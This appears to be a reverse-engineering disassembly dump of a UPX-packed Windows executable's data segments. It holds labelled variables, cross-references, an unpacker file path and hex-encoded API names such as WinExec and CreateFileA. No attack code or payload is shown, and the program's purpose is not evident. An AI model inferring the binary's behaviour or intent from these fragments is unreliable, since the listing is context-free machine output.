byte_42B958 db 0 ; DATA XREF: sub_412210+167�w
; sub_412210+200�o ...
align 4
dd 40h dup(0)
dword_42BA5C dd 0 ; DATA XREF: sub_412210+131�w
byte_42BA60 db 0 ; DATA XREF: sub_412210+149�w
; sub_414690+1BB�r ...
align 4
dd 41h dup(0)
byte_42BB68 db 0 ; DATA XREF: sub_412210+13D�w
; sub_412210+1D0�o
align 4
dd 41h dup(0)
byte_42BC70 db 0 ; DATA XREF: sub_412210+14F�w
; sub_412210+267�o ...
align 4
dd 40h dup(0)
dword_42BD74 dd 0 ; DATA XREF: sub_412210+96�w
; sub_412210+ED�w
byte_42BD78 db 0 ; DATA XREF: sub_412210+12A�w
; sub_412860+2F0�r ...
align 10h
dword_42BD80 dd 40h dup(0) ; DATA XREF: sub_412210+79�o
; sub_412210+1B2�o ...
db 0
byte_42BE81 db 0 ; DATA XREF: sub_412210+F9�w
align 8
byte_42BE88 db 0 ; DATA XREF: sub_412210+143�w
; sub_412210+280�o ...
align 4
dd 101h dup(0)
dword_42C290 dd 1050h dup(0) ; DATA XREF: sub_412210+6D�o
; sub_412210+2A9�o ...
byte_4303D0 db 0 ; DATA XREF: sub_412210+105�w
align 8
byte_4303D8 db 0 ; DATA XREF: sub_412210+137�w
align 4
dd 40h dup(0)
dword_4304DC dd 0 ; DATA XREF: sub_412210+30F�w
; sub_412210+328�w ...
word_4304E0 dw 0 ; DATA XREF: sub_412210+314�w
; sub_412210+32E�w
align 4
dd 2 dup(0)
db 0
byte_4304ED db 0 ; DATA XREF: sub_412210+F3�w
align 10h
dd 0
dword_4304F4 dd 0 ; DATA XREF: sub_412100:loc_4121DB�r
; sub_412100+F3�w ...
dword_4304F8 dd 0 ; DATA XREF: sub_412100+E2�w
; sub_413410+75�r ...
dword_4304FC dd 0 ; DATA XREF: sub_412100+F9�w
dword_430500 dd 0 ; DATA XREF: sub_412100:loc_4121B7�r
; sub_412100+CF�w ...
dword_430504 dd 0 ; DATA XREF: sub_412100+BE�w
; sub_414690+514�r
dword_430508 dd 0 ; DATA XREF: sub_412100+D5�w
dword_43050C dd 0 ; DATA XREF: sub_412100:loc_41216F�r
; sub_412100+87�w ...
dword_430510 dd 0 ; DATA XREF: sub_412100+76�w
dword_430514 dd 0 ; DATA XREF: sub_412100+8D�w
dword_430518 dd 0 ; DATA XREF: sub_412100:loc_41214B�r
; sub_412100+63�w ...
dword_43051C dd 0 ; DATA XREF: sub_412100+52�w
dword_430520 dd 0 ; DATA XREF: sub_412100+69�w
dword_430524 dd 0 ; DATA XREF: sub_412100:loc_412127�r
; sub_412100+3F�w ...
dword_430528 dd 0 ; DATA XREF: sub_412100+2E�w
; sub_414690+CA�r ...
dword_43052C dd 0 ; DATA XREF: sub_412100+45�w
; sub_414690+D9�r
dword_430530 dd 0 ; DATA XREF: sub_412100�r
; sub_412100+1B�w ...
dword_430534 dd 0 ; DATA XREF: sub_412100+A�w
; sub_412210+33A�w ...
dword_430538 dd 0 ; DATA XREF: sub_412100+21�w
; sub_412210:loc_412544�r ...
dword_43053C dd 0 ; DATA XREF: sub_412100:loc_412193�r
; sub_412100+AB�w ...
dword_430540 dd 0 ; DATA XREF: sub_412100+9A�w
; sub_414690:loc_414BFB�r ...
dword_430544 dd 0 ; DATA XREF: sub_412100+B1�w
dword_430548 dd 0 ; DATA XREF: sub_412760�r sub_412760+F�r ...
dd 52h dup(0)
dword_430694 dd 0 ; DATA XREF: sub_412210+AE�w
; sub_413410+22E�r
dword_430698 dd 0 ; DATA XREF: sub_413410+105�w
byte_43069C db 0 ; DATA XREF: sub_413410+117�w
byte_43069D db 0 ; DATA XREF: sub_412CA0+382�w
byte_43069E db 0 ; DATA XREF: sub_412CA0+347�w
; sub_413410+111�w
byte_43069F db 0 ; DATA XREF: sub_412CA0+366�w
; sub_412CA0:loc_41306B�w ...
dd 2 dup(0)
byte_4306A8 db 0 ; DATA XREF: sub_412210+16D�w
; sub_412CA0+BF�o ...
align 4
dd 0FFh dup(0)
dword_430AA8 dd 0 ; DATA XREF: sub_412CA0+15D�r
; sub_412CA0+23D�r ...
dword_430AAC dd 0 ; DATA XREF: sub_412210+90�w
; sub_4137C0+11�w ...
dword_430AB0 dd 0 ; DATA XREF: sub_413870:loc_413886�r
; sub_413870+26�w
byte_430AB4 db 0 ; DATA XREF: sub_412210+C0�w
; sub_414690:loc_414CF3�r
align 2
byte_430AB6 db 0 ; DATA XREF: sub_412210+9C�w
; sub_414690:loc_414AE7�r
byte_430AB7 db 0 ; DATA XREF: sub_412210+C6�w
; sub_414690:loc_414CB1�r
byte_430AB8 db 0 ; DATA XREF: sub_412210+8A�w
; sub_414690:loc_414C6F�r
align 2
byte_430ABA db 0 ; DATA XREF: sub_412210+A2�w
; sub_414690:loc_414D47�r
byte_430ABB db 0 ; DATA XREF: sub_412210+A8�w
; sub_414690+573�r
dword_430ABC dd 0 ; DATA XREF: sub_414280+8B�r
; sub_414280+98�w ...
byte_430AC0 db 0 ; DATA XREF: sub_412210+7E�w
; sub_412860+2C9�w ...
byte_430AC1 db 0 ; DATA XREF: sub_412210+BA�w
; sub_414690+D0�w ...
align 8
dword_430AC8 dd 0 ; DATA XREF: sub_4164B0+25�o
; sub_4164F0+79�o ...
dd 3 dup(0)
dword_430AD8 dd 0 ; DATA XREF: sub_4165C0+B7�w
; sub_417180+18�r ...
align 10h
dword_430AE0 dd 0 ; DATA XREF: sub_416700+37�w
; sub_416740�r ...
dd 2 dup(0)
dword_430AEC dd 0 ; DATA XREF: sub_416DF0+84�r
dword_430AF0 dd 0 ; DATA XREF: sub_417710+D6�r
dd 2 dup(0)
dword_430AFC dd 0 ; DATA XREF: sub_416D60+1�r
dd 5 dup(0)
dword_430B14 dd 0 ; DATA XREF: sub_4165C0+83�w
; sub_4165C0+9B�w ...
align 10h
dword_430B20 dd 0 ; DATA XREF: sub_4165C0+EB�r
dword_430B24 dd 6 dup(0) ; DATA XREF: UPX0:0042A060�o
dword_430B3C dd 0 ; DATA XREF: sub_416D60+4B�r
; sub_416D60+55�w ...
dword_430B40 dd 0 ; DATA XREF: sub_416D60:loc_416D98�r
; sub_416D60+46�w ...
align 8
dword_430B48 dd 0 ; DATA XREF: sub_416DC0+B�r
; sub_416DF0+176�w
align 10h
dword_430B50 dd 100h dup(0) ; DATA XREF: sub_416DF0+167�o
dword_430F50 dd 0 ; DATA XREF: sub_416D60+14�r
; sub_416DF0+6C�w
align 8
dword_430F58 dd 0 ; DATA XREF: sub_417180�r
; sub_417180+28�w ...
dword_430F5C dd 0 ; DATA XREF: sub_417180+22�r
; sub_417180+3D�w ...
dword_430F60 dd 0 ; DATA XREF: sub_417180+43�r
; sub_417180+62�w ...
align 8
dword_430F68 dd 0 ; DATA XREF: sub_417290+D�r
; sub_417290+19�w
dword_430F6C dd 0 ; DATA XREF: sub_417710:loc_417806�r
; sub_417710:loc_417837�w ...
dword_430F70 dd 0 ; DATA XREF: sub_417710+41�r
; sub_417B60+A�w ...
dword_430F74 dd 0 ; DATA XREF: sub_417710+1C�r
; sub_417710+FF�r ...
dword_430F78 dd 0 ; DATA XREF: sub_417860+A2�r
; sub_417B60+55�w
dword_430F7C dd 0 ; DATA XREF: sub_417860+30�r
; sub_417860+68�w ...
word_430F80 dw 0 ; DATA XREF: sub_418B00+271�w
; sub_418D90+11E�o ...
word_430F82 dw 0 ; DATA XREF: sub_418B00+F�r
; sub_418B00:loc_418D53�w
dd 1Dh dup(0)
dword_430FF8 dd 0 ; DATA XREF: sub_417DA0+49�r
; sub_4185D0+25�w ...
dword_430FFC dd 0 ; DATA XREF: sub_417C70+4C�w
; sub_417DA0+ED�r ...
dword_431000 dd 0 ; DATA XREF: sub_417C70+58�w
; sub_418060+98�r ...
align 8
dword_431008 dd 0 ; DATA XREF: sub_418060+41�r
; sub_4189C0+B9�r ...
dd 3Fh dup(0)
dword_431108 dd 0 ; DATA XREF: sub_418060+4F�r
; sub_4189C0+C7�r ...
dd 3Fh dup(0)
dword_431208 dd 0 ; DATA XREF: sub_4182A0+24�w
; sub_4182D0+14�r ...
align 10h
word_431210 dw 0 ; DATA XREF: sub_418060+6A�w
; sub_4189C0+25�o
align 4
dd 3FFFh dup(0)
word_441210 dw 0 ; DATA XREF: sub_417C70�o
; sub_418060+20�w ...
align 4
dd 8 dup(0)
word_441234 dw 0 ; DATA XREF: sub_418220+32�r
align 4
word_441238 dw 0 ; DATA XREF: sub_418220+3C�r
align 4
dd 2 dup(0)
word_441244 dw 0 ; DATA XREF: sub_418220+46�r
align 4
dd 11h dup(0)
dword_44128C dd 0 ; DATA XREF: sub_418220+20�o
dword_441290 dd 0E0h dup(0) ; DATA XREF: sub_418220+50�o
word_441610 dw 0 ; DATA XREF: sub_417C70+46�w
; sub_418220+5E�o
align 4
word_441614 dw 0 ; DATA XREF: sub_418060+32�w
align 4
dd 1Ch dup(0)
dword_441688 dd 11Fh dup(0) ; DATA XREF: sub_417C70+16�o
dword_441B04 dd 0 ; DATA XREF: sub_4182A0+19�w
; sub_4182D0+34�r ...
byte_441B08 db 2 dup(0) ; DATA XREF: sub_418B00+242�o
; sub_418D90+123�o ...
word_441B0A dw 0 ; DATA XREF: sub_418B00:loc_418CA0�w
; sub_418B00:loc_418CD0�w ...
dd 11Eh dup(0)
db 2 dup(0)
word_441F86 dw 0 ; DATA XREF: sub_418B00+22F�o
dword_441F88 dd 0 ; DATA XREF: sub_417CF0�r
; sub_417CF0+7F�r ...
dword_441F8C dd 0 ; DATA XREF: sub_417DA0:loc_417F20�r
dword_441F90 dd 0 ; DATA XREF: sub_417CF0+C�r
; sub_417CF0+2B�r ...
dword_441F94 dd 0 ; DATA XREF: sub_417CF0+24�r
; sub_4185D0+E7�r ...
dd 23Ch dup(0)
byte_442888 db 0 ; DATA XREF: sub_418060+F�w
; sub_4189C0:loc_418A04�r
align 4
dd 1FFFh dup(0)
dword_44A888 dd 0 ; DATA XREF: sub_417C70+5E�w
; sub_418060+5E�r ...
dword_44A88C dd 0 ; DATA XREF: sub_4182A0+13�w
; sub_4182D0+2E�r ...
dword_44A890 dd 0 ; DATA XREF: sub_418B00+21�w
; sub_418D90+7B�r ...
dword_44A894 dd 0 ; DATA XREF: sub_417DA0+21�w
; sub_417DA0+AC�w ...
dword_44A898 dd 0 ; DATA XREF: sub_417DA0+26�w
; sub_418B00+165�w
dword_44A89C dd 0 ; DATA XREF: sub_417DA0+2B�w
; sub_418B00+16B�w
dword_44A8A0 dd 0 ; DATA XREF: sub_417DA0+30�w
; sub_418B00+171�w ...
dword_44A8A4 dd 0 ; DATA XREF: sub_417DA0+35�w
; sub_418B00+177�w ...
dword_44A8A8 dd 0 ; DATA XREF: sub_417DA0+3A�w
; sub_418B00+17D�w
dword_44A8AC dd 0 ; DATA XREF: sub_417DA0+3F�w
; sub_418B00+183�w
dword_44A8B0 dd 0 ; DATA XREF: sub_417DA0+44�w
; sub_418B00+189�w
align 8
dword_44A8B8 dd 0 ; DATA XREF: sub_4189C0+8F�r
; sub_418B00+4E�w
dd 1Ch dup(0)
byte_44A92C db 0 ; DATA XREF: sub_417C70+6A�w
; sub_418060+72�r ...
align 10h
byte_44A930 db 0 ; DATA XREF: sub_418060+A3�w
; sub_4189C0+1D�o ...
align 4
dd 3FFh dup(0)
dword_44B930 dd 0 ; DATA XREF: sub_4182A0+29�w
; sub_4182D0+8�r ...
dword_44B934 dd 0 ; DATA XREF: sub_4182A0+1E�w
; sub_418370:loc_418413�r ...
byte_44B938 db 0 ; DATA XREF: sub_417CF0+41�r
; sub_417CF0+47�r ...
align 4
dd 8Fh dup(0)
dword_44BB78 dd 0 ; DATA XREF: sub_418B00+1C�w
; sub_418D90+85�r ...
dword_44BB7C dd 0 ; DATA XREF: sub_417C70+52�w
; sub_417DA0+C9�r ...
dword_44BB80 dd 0 ; DATA XREF: sub_418220+27�r
; sub_418220:loc_41828B�r ...
dword_44BB84 dd 0 ; DATA XREF: sub_417C70+64�w
; sub_418060+9�r ...
dword_44BB88 dd 0 ; DATA XREF: sub_418060:loc_41808A�r
; sub_4189C0:loc_418A24�r ...
dd 3Fh dup(0)
word_44BC88 dw 0 ; DATA XREF: sub_417C70+2F�o
; sub_417F80+56�w ...
word_44BC8A dw 0 ; DATA XREF: sub_418780:loc_4187D6�r
; sub_418780+7F�r ...
dd 0Fh dup(0)
word_44BCC8 dw 0 ; DATA XREF: sub_417F80:loc_417FF0�w
; sub_418780+A0�r
word_44BCCA dw 0 ; DATA XREF: sub_418780:loc_418819�r
word_44BCCC dw 0 ; DATA XREF: sub_417F80+7E�w
; sub_418780+C1�r
word_44BCCE dw 0 ; DATA XREF: sub_418780+B9�r
word_44BCD0 dw 0 ; DATA XREF: sub_417F80:loc_418007�w
; sub_418780+DB�r
word_44BCD2 dw 0 ; DATA XREF: sub_418780:loc_418854�r
dword_44BCD4 dd 14h dup(0) ; DATA XREF: sub_417C70+3A�o
byte_44BD24 db 0 ; DATA XREF: sub_417C70+70�w
; sub_418060+64�r ...
align 4
word_44BD28 dw 0 ; DATA XREF: sub_417C70+1D�o
; sub_418060:loc_4180B6�w ...
align 4
word_44BD2C dw 0 ; DATA XREF: sub_418060+140�r
align 10h
word_44BD30 dw 0 ; DATA XREF: sub_418060+12B�r
align 4
word_44BD34 dw 0 ; DATA XREF: sub_418060+116�r
align 4
word_44BD38 dw 0 ; DATA XREF: sub_418060+FD�r
align 4
word_44BD3C dw 0 ; DATA XREF: sub_418060:loc_418150�r
align 10h
dd 18h dup(0)
dword_44BDA0 dd 1Fh dup(0) ; DATA XREF: sub_417C70+28�o
dword_44BE1C dd 0 ; DATA XREF: sub_4182A0+C�w
; sub_4182D0+3F�r ...
dword_44BE20 dd 0 ; DATA XREF: sub_418B00+16�w
; sub_418D90+71�r ...
align 8
dword_44BE28 dd 0 ; DATA XREF: sub_4189C0+EF�r
; sub_418B00+AE�w ...
dd 1Dh dup(0)
dword_44BEA0 dd 0 ; DATA XREF: sub_419224+20�o
; sub_419224+36�w ...
dd 2 dup(0)
dword_44BEAC dd 0 ; DATA XREF: sub_419224+6�r
; sub_419224+15�w
dword_44BEB0 dd 0 ; DATA XREF: start-65704�w
; sub_41FEAC:loc_41FEBE�r ...
align 8
dword_44BEB8 dd 0 ; DATA XREF: sub_41A4AE�r sub_41A4D3�r ...
dword_44BEBC dd 0 ; DATA XREF: sub_41E51D+14C�w
; sub_421BE0�w
dword_44BEC0 dd 0 ; DATA XREF: sub_41AC2A�r
dword_44BEC4 dd 0 ; DATA XREF: sub_41AC3E�r
dword_44BEC8 dd 0 ; DATA XREF: UPX0:0041AD9C�r
dd 3 dup(0)
off_44BED8 dd offset sub_41B30A ; DATA XREF: sub_41B4E8+38�w
; sub_41B4E8+80�w ...
dword_44BEDC dd 77E78B61h ; DATA XREF: sub_41B330+10�r
; sub_41B4E8+45�w ...
dword_44BEE0 dd 77E79B39h ; DATA XREF: sub_41B330+37�r
; sub_41B4E8+52�w ...
dword_44BEE4 dd 77E72B29h ; DATA XREF: sub_41B313+B�r
; sub_41B4E8+60�w ...
dword_44BEE8 dd 1 ; DATA XREF: sub_41C18B+E�r
; sub_41C18B+31�w ...
align 10h
dword_44BEF0 dd 0E9AE78h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_41CF94+4�o
; UPX0:off_42A720�o
dword_44BF08 dd 0E9AEA0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: UPX0:0042A728�o
dword_44BF20 dd 0E9AEC8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: UPX0:0042A738�o
dd 0E9AEF0h, 0FFFFFFFFh, 4 dup(0)
dword_44BF50 dd 0E9AF18h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: UPX0:0042A750�o
dd 0E9AF40h, 0FFFFFFFFh, 4 dup(0)
dd 0E9AF68h, 0FFFFFFFFh, 4 dup(0)
byte_44BF98 db 90h ; DATA XREF: UPX0:0042A770�o
db 0AFh, 0E9h, 0
dd 0FFFFFFFFh, 4 dup(0)
dword_44BFB0 dd 0E9AFB8h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: UPX0:0042A780�o
dd 0E9AFE0h, 0FFFFFFFFh, 4 dup(0)
dd 0E99D20h, 0FFFFFFFFh, 4 dup(0)
dword_44BFF8 dd 0E99D48h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: UPX0:0042A7A0�o
dd 0E99D70h, 0FFFFFFFFh, 4 dup(0)
dd 0E99D98h, 0FFFFFFFFh, 4 dup(0)
dword_44C040 dd 0 ; DATA XREF: sub_419DCB�r
; sub_41E82C+147�r ...
dword_44C044 dd 0 ; DATA XREF: sub_4222C9+14A�r
dword_44C048 dd 2 ; DATA XREF: start-657F0�w
; sub_41C0A8+34�r ...
dword_44C04C dd 0A28h ; DATA XREF: start-657D0�w start-657BF�w
dword_44C050 dd 501h ; DATA XREF: start-657B4�w
dword_44C054 dd 5 ; DATA XREF: start-657E7�w
; sub_41D118+9�r ...
dword_44C058 dd 1 ; DATA XREF: start-657DF�w
dword_44C05C dd 1 ; DATA XREF: sub_4200DF+8F�w
dword_44C060 dd 3429A0h ; DATA XREF: sub_4200DF+95�w
align 8
dword_44C068 dd 3429C0h ; DATA XREF: sub_41FEAC+48�w
; sub_41FEAC:loc_41FF5D�r ...
dd 3 dup(0)
off_44C078 dd offset aCM_unpackerPac ; DATA XREF: sub_4200DF+37�w
; "C:\\m_unpacker\\packed.exe"
align 10h
byte_44C080 db 0 ; DATA XREF: sub_41AB1A+5�r
; sub_41EA9D+3D�w
align 4
dword_44C084 dd 0 ; DATA XREF: sub_41EA9D:loc_41EAD1�w
dword_44C088 dd 0 ; DATA XREF: sub_41EA9D+1C�r
; sub_41EA9D+9C�w
dword_44C08C dd 77C26E79h ; DATA XREF: sub_41EC16:loc_41EC41�r
; sub_41EC16+40�r ...
dd 2 dup(0)
dword_44C098 dd 0 ; DATA XREF: sub_41FCB2+21�r
align 10h
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_4200DF+1C�o
; UPX0:off_44C078�o
align 4
dd 3Ah dup(0)
byte_44C1A4 db 0 ; DATA XREF: sub_4200DF+23�w
align 4
dword_44C1A8 dd 1 ; DATA XREF: sub_420181+2�r
; sub_420181+24�w ...
dd 2 dup(0)
dword_44C1B4 dd 0 ; DATA XREF: sub_41C18B+265�r
; sub_420DD8+14A�r
dd 3 dup(0)
dword_44C1C4 dd 0 ; DATA XREF: sub_41C18B+9D�r
; sub_41C18B+272�r ...
dd 0
dword_44C1CC dd 0 ; DATA XREF: sub_42067F+9�r
; sub_42067F+38�w ...
dword_44C1D0 dd 0 ; DATA XREF: sub_42067F+4D�w
; sub_42067F:loc_420744�r
dword_44C1D4 dd 0 ; DATA XREF: sub_42067F+5B�w
; sub_42067F+D6�r
dword_44C1D8 dd 0 ; DATA XREF: sub_42067F+7B�w
; sub_42067F:loc_4206FF�r
dword_44C1DC dd 0 ; DATA XREF: sub_42067F+6C�w
; sub_42067F+9C�r
dword_44C1E0 dd 0 ; DATA XREF: sub_420778:loc_4207FF�r
; sub_420778+13F�r ...
align 8
dword_44C1E8 dd 0 ; DATA XREF: sub_420778:loc_420812�r
; sub_420778+1C4�r ...
dd 0Fh dup(0)
dword_44C228 dd 0 ; DATA XREF: sub_420778+12C�o
; sub_420778+191�o ...
dword_44C22C dd 0 ; DATA XREF: UPX0:off_42ABD8�o
; UPX0:off_42ABDC�o ...
dword_44C230 dd 0 ; DATA XREF: sub_41B13E+A2�r
dword_44C234 dd 0 ; DATA XREF: sub_41B13E+B�r
dd 9 dup(0)
dword_44C25C dd 1 ; DATA XREF: sub_420DD8+E�r
; sub_420DD8+2E�w ...
dd 9 dup(0)
dword_44C284 dd 1 ; DATA XREF: sub_421204:loc_42136E�r
; sub_421394+1D�w ...
dword_44C288 dd 77E7C706h ; DATA XREF: sub_421D85+C�r
; sub_421D85+39�w ...
dword_44C28C dd 0 ; DATA XREF: sub_41E51D+7�r
dd 32h dup(0)
dword_44C358 dd 0 ; DATA XREF: sub_4228AF:loc_422931�o
; sub_4228AF+87�r
dword_44C35C dd 0 ; DATA XREF: sub_4228AF:loc_4228F7�o
; sub_4228AF+4D�r
dword_44C360 dd 0 ; DATA XREF: sub_4228AF:loc_4228EA�o
; sub_4228AF+40�r
dword_44C364 dd 0 ; DATA XREF: sub_4228AF:loc_422904�o
; sub_4228AF+5A�r
dd 0
dword_44C36C dd 0 ; DATA XREF: sub_4222C9+3D�r
dd 2 dup(0)
dword_44C378 dd 0 ; DATA XREF: sub_4175C0+50�r
; sub_417B60+63�w
dword_44C37C dd 0 ; DATA XREF: sub_4175C0+1B�r
; sub_417860+8E�w ...
dword_44C380 dd 0 ; DATA XREF: sub_4175C0+3�r
; sub_417B60+77�w
dword_44C384 dd 0 ; DATA XREF: sub_4175C0+106�w
; sub_417710+64�r ...
dd 6 dup(0)
word_44C3A0 dw 0 ; DATA XREF: sub_417710:loc_417793�r
; sub_417710:loc_4177A8�w ...
align 4
dword_44C3A4 dd 3FFEh dup(0)
db 2 dup(0)
word_45C39E dw 0 ; DATA XREF: sub_417B60+29�w
dword_45C3A0 dd 0 ; DATA XREF: sub_416DF0+5E�w
; sub_417710:loc_417720�r ...
dd 6 dup(0)
db 3 dup(0)
byte_45C3BF db 0 ; DATA XREF: sub_417860+209�r
; sub_417860+2BB�r
byte_45C3C0 db 0 ; DATA XREF: sub_4175C0+21�r
; sub_4175C0:loc_417621�r ...
byte_45C3C1 db 0 ; DATA XREF: sub_417B60+DB�r
byte_45C3C2 db 0 ; DATA XREF: sub_417860+45�r
; sub_417860+15C�r
align 4
dd 3Fh dup(0)
db 2 dup(0)
dword_45C4C2 dd 0 ; DATA XREF: sub_4175C0+42�r
align 4
dd 1FBEh dup(0)
dword_4643C0 dd 1F10h dup(0) ; DATA XREF: sub_417710+58�o
UPX0 ends
; Section 2. (virtual address 0006C000)
; Virtual size : 00014000 ( 81920.)
; Section size in file : 00014000 ( 81920.)
; Offset to raw data for section: 0006C000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 46C000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_46C000 dd 0F0h dup(0) ; DATA XREF: start+1�o
word_46C3C0 dw 0 ; DATA XREF: sub_4175C0+125�r
; sub_417710:loc_4177C0�r ...
align 4
dd 3FFFh dup(0)
dword_47C3C0 dd 0 ; DATA XREF: sub_417710+4E�r
; sub_417710+70�w ...
dword_47C3C4 dd 0 ; DATA XREF: sub_4175C0+8�r
; sub_417710+16�r ...
dword_47C3C8 dd 0 ; DATA XREF: sub_4175C0+100�r
; sub_417860+B6�r ...
dword_47C3CC dd 0 ; DATA XREF: sub_4165C0+2D�w
dword_47C3D0 dd 0 ; DATA XREF: sub_4165C0+BC�w
; sub_4165C0+DD�r ...
dword_47C3D4 dd 0 ; DATA XREF: sub_4165C0+F3�r
dword_47C3D8 dd 0 ; DATA XREF: sub_42104F+1A�w
; sub_421078+84�r ...
dword_47C3DC dd 342778h ; DATA XREF: sub_41B3A1+97�r
; sub_421394+77�r ...
dword_47C3E0 dd 0 ; DATA XREF: sub_42104F+15�w
; sub_421204+F2�w ...
dd 7 dup(0)
byte_47C400 db 0 ; DATA XREF: sub_42104F+6�o
; sub_421204+52�o ...
byte_47C401 db 0 ; DATA XREF: sub_41FF73+47�r
; sub_41FF73+11D�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_47C504 dd 4E4h ; DATA XREF: sub_42104F+10�w
; sub_421078+16�r ...
align 10h
word_47C510 dw 0 ; DATA XREF: sub_42104F+1F�o
; sub_421204+109�o ...
align 10h
byte_47C520 db 0 ; DATA XREF: sub_421078:loc_42118A�w
; sub_421078:loc_4211A7�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_47C620 dd 0 ; DATA XREF: sub_41B13E+79�r
dword_47C624 dd 0 ; DATA XREF: sub_41B13E+29�r
dword_47C628 dd 0 ; DATA XREF: sub_41B13E+4C�r
dword_47C62C dd 20h ; DATA XREF: sub_41DD29+F�r
; sub_41E126+F�r ...
dd 4 dup(0)
dword_47C640 dd 341F28h ; DATA XREF: sub_41AA71+80�r
; sub_41C547+AC�r ...
dword_47C644 dd 3Fh dup(0) ; DATA XREF: sub_4202A3+9A�o
dword_47C740 dd 1 ; DATA XREF: sub_41FEAC+9F�w
dword_47C744 dd 342F20h ; DATA XREF: sub_41A1C1+D�r
; sub_41A1C1:loc_41A217�r ...
dword_47C748 dd 342EF8h ; DATA XREF: sub_41A1C1+1�r
; sub_41A1C1+15�r ...
dword_47C74C dd 1 ; DATA XREF: sub_41FE4F+4�r
; sub_41FEAC+3�r ...
dword_47C750 dd 0 ; DATA XREF: sub_41EA33�r
dword_47C754 dd 0 ; DATA XREF: sub_41D183+21�w
; sub_41D1F6+21C�r ...
dword_47C758 dd 0 ; DATA XREF: sub_41D183+28�w
; sub_41D1CB�r ...
dword_47C75C dd 0 ; DATA XREF: sub_41D183+15�w
; sub_41D1CB+8�r ...
dword_47C760 dd 0 ; DATA XREF: sub_419D24+18�r
; sub_41D183+36�w ...
dword_47C764 dd 0 ; DATA XREF: sub_41D183+2F�w
; sub_41D1F6+300�w ...
dword_47C768 dd 0 ; DATA XREF: sub_41D183+3C�w
; sub_41D50E+5�r ...
dword_47C76C dd 0 ; DATA XREF: sub_41D1F6+229�r
; sub_41D1F6+249�r ...
dword_47C770 dd 340000h ; DATA XREF: sub_419D24+5D�r
; sub_419DDD+5F�r ...
dword_47C774 dd 1 ; DATA XREF: sub_419D24+F�r
; sub_419D24:loc_419D6F�r ...
dword_47C778 dd 342F80h ; DATA XREF: sub_41AA71+2B�w
; sub_41AA71+44�w ...
align 10h
dword_47C780 dd 400h dup(0) ; DATA XREF: UPX0:off_42A2E0�o
; UPX0:0042A2E8�o
dword_47D780 dd 200h ; DATA XREF: sub_41AA71�r
; sub_41AA71:loc_41AA8B�w ...
dword_47D784 dd 0E92340h ; DATA XREF: start-6570E�w
; sub_41FE4F:loc_41FE60�r ...
dd 21Eh dup(0)
dd 0C4h, 23020h, 696E4901h, 6C616974h, 43657A69h, 69746972h
dd 536C6163h, 69746365h, 1006E6Fh, 46746553h, 50656C69h
dd 746E696Fh, 1007265h, 61427349h, 646F4364h, 72745065h
dd 73490100h, 52646142h, 50646165h, 1007274h, 4F746547h
dd 50434D45h, 65470100h, 50434174h, 65470100h, 72745374h
dd 54676E69h, 57657079h, 65470100h, 72745374h, 54676E69h
dd 41657079h, 65470100h, 636F4C74h, 49656C61h, 416F666Eh
dd 65470100h, 49504374h, 6F666Eh, 746E4901h, 6F6C7265h
dd 64656B63h, 68637845h, 65676E61h, 65470100h, 6C694674h
dd 70795465h, 53010065h, 61487465h, 656C646Eh, 6E756F43h
dd 47010074h, 6E457465h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 46010057h, 45656572h, 7269766Eh, 656D6E6Fh
dd 7453746Eh, 676E6972h, 1005773h, 45746547h, 7269766Eh
dd 656D6E6Fh, 7453746Eh, 676E6972h, 46010073h, 45656572h
dd 7269766Eh, 656D6E6Fh, 7453746Eh, 676E6972h, 1004173h
dd 61686E55h, 656C646Eh, 63784564h, 69747065h, 69466E6Fh
dd 7265746Ch, 65540100h, 6E696D72h, 54657461h, 61657268h
dd 43010064h, 65736F6Ch, 646E6148h, 100656Ch, 64616552h
dd 656C6946h, 72430100h, 65746165h, 656C6946h, 6C010041h
dd 63727473h, 41706Dh, 74736C01h, 79706372h, 100416Eh
dd 646E6946h, 736F6C43h, 46010065h, 4E646E69h, 46747865h
dd 41656C69h, 69460100h, 6946646Eh, 46747372h, 41656C69h
dd 6C530100h, 706565h, 74736C01h, 74616372h, 6C010041h
dd 6C727473h, 416E65h, 74736C01h, 79706372h, 47010041h
dd 72447465h, 54657669h, 41657079h, 65530100h, 72685474h
dd 50646165h, 726F6972h, 797469h, 74654701h, 72727543h
dd 54746E65h, 61657268h, 57010064h, 65746972h, 656C6946h
dd 6F4D0100h, 69466576h, 41656Ch, 6E695701h, 63657845h
dd 65470100h, 72754374h, 746E6572h, 65726944h, 726F7463h
dd 1004179h, 43746547h, 65727275h, 6854746Eh, 64616572h
dd 1006449h, 46746547h, 53656C69h, 657A69h, 646F4D01h
dd 33656C75h, 78654E32h, 53010074h, 74537465h, 6E614864h
